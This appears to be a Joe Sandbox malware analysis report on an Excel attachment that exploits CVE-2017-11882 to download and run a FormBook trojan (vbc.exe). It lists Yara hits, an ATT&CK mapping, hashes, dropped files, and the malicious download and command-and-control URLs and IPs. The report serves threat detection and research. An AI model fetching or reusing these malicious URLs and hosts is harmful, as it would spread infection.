Source: Yara match	File source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Application Shimming1	Process Injection612	Masquerading111	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Application Shimming1	Disable or Modify Tools2	LSASS Memory	Security Software Discovery251	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion2	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol122	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information3	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing11	DCSync	System Information Discovery115	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Sajeeb09908976745344567.xlsx	30%	Virustotal		Browse
Sajeeb09908976745344567.xlsx	22%	ReversingLabs	Document-Excel.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	36%	ReversingLabs	Win32.Trojan.Nsisx
C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll	0%	ReversingLabs
C:\Users\Public\vbc.exe	36%	ReversingLabs	Win32.Trojan.Nsisx

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.2.vbc.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
4.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
4.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
8.2.netsh.exe.6d3da0.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
5.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
4.2.vbc.exe.3030000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.2.netsh.exe.2c6796c.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
5.1.vbc.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://www.washingtonboatrentals.com/mxnu/?0h=6lxhT6_0RrqDgXE0&bV8=5sVEEjOjrPj2idxjAkM9c91RRKirbtM3qCtWvXETAP1vtyCGbasEc4a0ZRfXFvjfhHczKQ==	0%	Avira URL Cloud	safe
http://java.sun.com	0%	Virustotal		Browse
http://java.sun.com	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
www.naplesconciergerealty.com/mxnu/	7%	Virustotal		Browse
www.naplesconciergerealty.com/mxnu/	100%	Avira URL Cloud	malware
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://192.3.110.172/000900/vbc.exe	100%	Avira URL Cloud	malware
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.washingtonboatrentals.com	3.64.163.50	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.washingtonboatrentals.com/mxnu/?0h=6lxhT6_0RrqDgXE0&bV8=5sVEEjOjrPj2idxjAkM9c91RRKirbtM3qCtWvXETAP1vtyCGbasEc4a0ZRfXFvjfhHczKQ==	true	Avira URL Cloud: safe	unknown
www.naplesconciergerealty.com/mxnu/	true	7%, Virustotal, Browse Avira URL Cloud: malware	low
http://192.3.110.172/000900/vbc.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp	false		high
http://investor.msn.com	explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp	false		high
http://wellformedweb.org/CommentAPI/	explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.iis.fhg.de/audioPA	explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com0	explorer.exe, 00000006.00000000.514857516.0000000008118000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	vbc.exe, 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.490591816.0000000000409000.00000008.00020000.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp	false		high
http://treyresearch.net	explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp	false		high
http://java.sun.com	explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.icra.org/vocabulary/.	explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/c	explorer.exe, 00000006.00000000.547402382.00000000083E6000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000004.00000002.494713869.0000000001F10000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.516768137.0000000001BE0000.00000002.00020000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	vbc.exe, vbc.exe, 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.490591816.0000000000409000.00000008.00020000.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000006.00000000.544811252.000000000447A000.00000004.00000001.sdmp	false		high
http://investor.msn.com/	explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.piriform.com/ccleaner	explorer.exe, 00000006.00000000.544811252.000000000447A000.00000004.00000001.sdmp	false		high
http://computername/printers/printername/.printer	explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low
http://www.%s.comPA	vbc.exe, 00000004.00000002.494713869.0000000001F10000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.516768137.0000000001BE0000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://www.autoitscript.com/autoit3	explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp	false		high
https://support.mozilla.org	explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp	false		high
http://www.piriform.com/ccleanerv	explorer.exe, 00000006.00000000.547402382.00000000083E6000.00000004.00000001.sdmp	false		high
http://servername/isapibackend.dll	explorer.exe, 00000006.00000000.510963296.0000000003E50000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
3.64.163.50	www.washingtonboatrentals.com	United States		16509	AMAZON-02US	true
192.3.110.172	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	502271
Start date:	13.10.2021
Start time:	19:01:48
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 27s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Sajeeb09908976745344567.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@9/15@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 18.3% (good quality ratio 17.4%) Quality average: 77.5% Quality standard deviation: 27.9%
HCA Information:	Successful, ratio: 80% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
19:02:52	API Interceptor	83x Sleep call for process: EQNEDT32.EXE modified
19:03:00	API Interceptor	60x Sleep call for process: vbc.exe modified
19:03:29	API Interceptor	229x Sleep call for process: netsh.exe modified
19:04:15	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3.64.163.50	pago atrasado.exe	Get hash	malicious	Browse	www.everythangbutwhite.com/u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo
	dtMT5xGa54.exe	Get hash	malicious	Browse	www.washingtonboatrentals.com/mxnu/?7nq=5sVEEjOmrIjyiN9vCkM9c91RRKirbtM3qC1GzUYSEv1utDuAcK9IK8i2a3TROe3U0hoE&nZkd=5jux_PXX
	Sauermann New Order.exe	Get hash	malicious	Browse	www.austindemolitioncontractor.com/b5ce/?6lXX=bq879k6PIBz+oRBHyJuPsdt6y2gkPqxT6d7DjVxQu7/X3zEo7DCM784DGAuEKxrnN+bH&Ytx=2dN4
	DHL Shipment Notification 74683783.exe	Get hash	malicious	Browse	www.laced.xyz/i6rd/?Y8=1bxX_L&k48hR8=bU44cI6fE0o4iZpo6i4S2m/nC9aLfjgVnfDy0K3sTdjFHTQB5cWrVvnhM2X89lB4R8AN
	549TXoJm6p.exe	Get hash	malicious	Browse	www.washingtonboatrentals.com/mxnu/?7nIdZB8X=5sVEEjOmrIjyiN9vCkM9c91RRKirbtM3qC1GzUYSEv1utDuAcK9IK8i2a0zrePXsuGJD&F0Gd=FTtl
	bGOw6FuOUA.exe	Get hash	malicious	Browse	www.oklahomaexcavation.com/tumb/?9r5T0HU8=4zPt7kWXGWh8HwUtv3PPZv5m2ZyxYLCi6mZUOZySZKAhwaBoSeDisr+J5xLeKjwvLd91&n0D=drcP0F7Pi
	FedEx_AWB#_224174658447.exe	Get hash	malicious	Browse	www.theexecutivefidgetset.com/c6bi/?B6Aljdbx=RXkkfcjOLYbVurqjx6Do7wX6XiONuzHvFSVLSigBzh6JR7xwn6Utb+JN3RYER/bqPk+5&FDHH=1bcdAJbhe
	Inquiry Urgent Grupo Dani Chile.exe	Get hash	malicious	Browse	www.austindemolitioncontractor.com/b5ce/?_H=bq879k6PIBz+oRBHyJuPsdt6y2gkPqxT6d7DjVxQu7/X3zEo7DCM784DGDC+JwHcOJ6WTAkuuQ==&1bHXKB=MPLdBHEh52ZHYR
	Angebotsanfrage 86548.exe	Get hash	malicious	Browse	www.atomizer.xyz/ou3t/?gFN4gfKP=qCel+gZZ+aBIYanTm7BoA5PU6r5HF03c6K+zh0Ia/cWjKu1aViUN5EQRe83WYvNeEkRU&3ff87=TXX86TTxSb7xn
	Cost Inquiry.exe	Get hash	malicious	Browse	www.villamante.com/b5ce/?mXeTaX=Jbmx24p0ClFL&J2M=7yv+sRlAJqST60jDhfTKkVYz9ALetPX59nt/q3NTarObbD6Qp3RvHJttKj33GsqHaGK/
	Mikbin.exe	Get hash	malicious	Browse	www.stockgorithm.com/da5x/?QpEpWh68=J+cZRauKlV/tggET7eClJZXSWMQFV+UNHr5fuOU02VP1OAVrGtEHn2Eq0bHkvDt33Ysy&x6kH=Xl_h-TZ09

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.washingtonboatrentals.com	dtMT5xGa54.exe	Get hash	malicious	Browse	3.64.163.50
www.washingtonboatrentals.com	549TXoJm6p.exe	Get hash	malicious	Browse	3.64.163.50

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	Paymentslip 10132021.xlsx	Get hash	malicious	Browse	192.3.13.95
	Swift.xlsx	Get hash	malicious	Browse	192.3.222.155
	ojZRw3eBpN	Get hash	malicious	Browse	107.172.24.165
	yEumlkJuVE	Get hash	malicious	Browse	107.173.176.7
	DHL consignment number_600595460.xlsx	Get hash	malicious	Browse	198.12.84.79
	4f0PBbcOBI	Get hash	malicious	Browse	107.173.176.7
	IdXkXl1i9r	Get hash	malicious	Browse	107.173.176.7
	RlypFfB7n8	Get hash	malicious	Browse	107.173.176.7
	7iw4z5I41w	Get hash	malicious	Browse	107.173.176.7
	6wfKGbEfZN	Get hash	malicious	Browse	107.173.176.7
	Invoice_Charge.xlsx	Get hash	malicious	Browse	192.227.158.101
	090900 Quotation - Urgent.xlsx	Get hash	malicious	Browse	107.172.13.131
	Contract.xlsx	Get hash	malicious	Browse	192.3.122.140
	REF_MIDLGB34.xlsx	Get hash	malicious	Browse	23.94.159.208
	PO08485.xlsx	Get hash	malicious	Browse	107.172.13.137
	lod1.xlsx	Get hash	malicious	Browse	192.3.122.140
	Invoice Charge.xlsx	Get hash	malicious	Browse	192.227.158.101
	TransportLabel_1189160070.xlsx	Get hash	malicious	Browse	192.3.110.172
	Nuevo pedido de consulta cotizacin.xlsx	Get hash	malicious	Browse	192.3.13.95
	Payment_List.xlsx	Get hash	malicious	Browse	107.172.73.191
AMAZON-02US	2OfuyvjJu1.msi	Get hash	malicious	Browse	52.95.163.44
	cvWFjfKtdH	Get hash	malicious	Browse	54.103.213.234
	K3h3TPEpze	Get hash	malicious	Browse	34.219.214.170
	Jrsuarez-62643-5799-80-950985.HTM	Get hash	malicious	Browse	54.230.206.106
	Jrsuarez-62643-5799-80-950985.HTM	Get hash	malicious	Browse	54.230.206.106
	Jrsuarez-62643-5799-80-950985.HTM	Get hash	malicious	Browse	54.230.206.51
	Jrsuarez-62643-5799-80-950985.HTM	Get hash	malicious	Browse	54.230.206.25
	Ref 0180066743.xlsx	Get hash	malicious	Browse	13.232.45.220
	pago atrasado.exe	Get hash	malicious	Browse	3.64.163.50
	6AYs2EgVeN.apk	Get hash	malicious	Browse	52.222.174.50
	4f0PBbcOBI	Get hash	malicious	Browse	34.249.145.219
	REQUIREMENT.exe	Get hash	malicious	Browse	3.121.211.190
	RlypFfB7n8	Get hash	malicious	Browse	54.171.230.55
	7iw4z5I41w	Get hash	malicious	Browse	34.249.145.219
	SecuriteInfo.com.Trojan.Linux.Generic.191302.28689.5288	Get hash	malicious	Browse	54.171.230.55
	ldJp8ogMLq.apk	Get hash	malicious	Browse	35.162.9.128
	ldJp8ogMLq.apk	Get hash	malicious	Browse	44.235.227.57
	SecuriteInfo.com.Linux.BtcMine.470.15094.2496	Get hash	malicious	Browse	108.157.2.216
	lpa-park.apk	Get hash	malicious	Browse	54.229.52.247
	acciona-mobility-1-21-1.apk	Get hash	malicious	Browse	143.204.225.4

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	TransportLabel_1189160070.xlsx	Get hash	malicious	Browse
C:\Users\Public\vbc.exe	TransportLabel_1189160070.xlsx	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll	dtMT5xGa54.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll	TransportLabel_1189160070.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	downloaded
Size (bytes):	290617
Entropy (8bit):	7.9395134807721
Encrypted:	false
SSDEEP:	6144:wBlL/c7HU+ICkZsFE03JDT37iHxU1D/RmNOZeXBiFkJTstHJXd0mU:Ce7HUDCysO0dLiWDc8ZHKmHImU
MD5:	0031A23B4BB6ABCDCCC5F8122DE5FCB5
SHA1:	BE50CDBB0AF4C77229E3DE0EC7F34088AAE64DC2
SHA-256:	2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E
SHA-512:	EED60BDA2D0A5FB02F823DB8CAF57D136DC6D003F49CA7D3CB6A620DCB1CF4AD4E52C6B9A40AEFE9126F9E137776AE23D78A2648F5609FA3D69989AB3D185CC2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 36%
Joe Sandbox View:	Filename: TransportLabel_1189160070.xlsx, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	http://192.3.110.172/000900/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.^...QF..QG.qQF.^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..\|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F69C161.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AB87D1A.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\869DD99B.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:	1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DE477EE.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	83904
Entropy (8bit):	7.986000888791215
Encrypted:	false
SSDEEP:	1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
MD5:	9F9A7311810407794A153B7C74AED720
SHA1:	EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
SHA-256:	000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
SHA-512:	27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
Malicious:	false
Preview:	.PNG........IHDR.............oi......IDATx..u\|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43\|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v:.....M......YUe.N....TI...]NQ.<..vm....o....\|yt:......P..d.]....bE.zr.....UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE98A654.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
